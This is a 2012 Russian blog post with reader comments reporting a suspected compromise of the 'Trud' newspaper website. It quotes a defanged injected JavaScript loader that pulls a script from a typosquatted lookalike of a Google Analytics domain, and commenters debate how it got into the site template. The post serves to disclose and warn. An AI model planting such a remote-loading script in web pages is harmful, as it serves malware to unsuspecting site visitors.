Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет pe3yc ([info]pe3yc)
@ 2012-02-21 23:00:00


Previous Entry  Add to memories!  Tell a Friend!  Next Entry
¤ Сайт "Труда", похоже, малость заражен
В сорце главной (и других страниц) имеется весьма подозрительный код:

[script type="text/javascript"]
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "gооgle-аnаlityсs.соm/gа.js' type='text/javascript'%3E%3C/script%3E"));
[/script]

(Угловые скобки заменены на квадратные, а некоторые латинские символы на кириллические — во избежание).

Тут надо помнить, что gооgle-аnаlityсs.соm это не gооgle-аnаlуtiсs.соm (который там тоже есть, и вполне безопасен), а совсем другая херь. И хостит эта херь очень нехорошие скриптики.

Поэтому я рекомендую админу "Труда" (если там вообще имеется админ) вычистить говно с сайта. А то как-то нехорошо получается, всё-таки федеральное СМИ..


(Добавить комментарий)


[info]qxd@lj
2012-02-21 17:17 (ссылка)
конечно нехорошо. админ труда небось с размещения скрипта имеет чё. а тут разоблачили.

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2012-02-21 17:20 (ссылка)
Чё он может там иметь с галимого трояна? Хозяева ботнетов пока ещё не платят всяким админам за заражение. Просто админ технику безопасности не соблюдает, вот и все дела.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]qxd@lj
2012-02-21 17:28 (ссылка)
иметь можно с руководства. на противопожарные меры, профилактические мероприятия, сверхурочную работу, поднаем аутсорсеров. или мы не знаем, как техотделы в забюрократихзированных структурах паразитируют.
так чтоб троянам позволяли болтаться, признаюсь, не видел, а чтоб запускали работу, чтоб потом мотивировать траты - сто раз видел.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2012-02-21 18:06 (ссылка)
А, ну это теоретически может быть. Но за такой явно админский косяк от начальства скорее можно разве что люлей огрести, а не финансирование дополнительных трат.

(Ответить) (Уровень выше)


[info]kinad@lj
2012-02-21 17:38 (ссылка)
На многих русскоязычных сайтах та же жопа, у меня часто антивирус на работе квакает, ладно б какие анекдоты, так нет, новостные говно-сайты, типа ИзРуса.

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2012-02-21 17:56 (ссылка)
Изрус у меня как-то ни разу не квакал.

(Ответить) (Уровень выше)


[info]antontsau@lj
2012-02-21 22:26 (ссылка)
а не жопоручие ли это, в терминальной стадии? ну то есть сам одмин туды такое ввел, потому что долго мучился и вспоминал где там i а где y, но так и не вспомнил? ссыкля прошла, так как сайт такой есть, это он еще проверил, а как оно там работает и что делает проверять и не подумал.

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2012-02-21 22:31 (ссылка)
На каждой странице? Очень маловероятно. И захостить malware script в соответствующем месте - это тоже жопорукость?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]antontsau@lj
2012-02-21 22:38 (ссылка)
там надо смотреть куды оно вставлено. Если там вполне осмысленно использование правильного сайта то скорее жопоручие, воткнул и не проверил, а если просто воткнуто где попало по всем страницам - то это черви и жабы адназначна.

(Ответить) (Уровень выше)


[info]maravan@lj
2012-02-22 01:41 (ссылка)
А что, по вашему, они каждую страницу руками делают?
Воткнули в шаблон - и вперед.

(Ответить) (Уровень выше)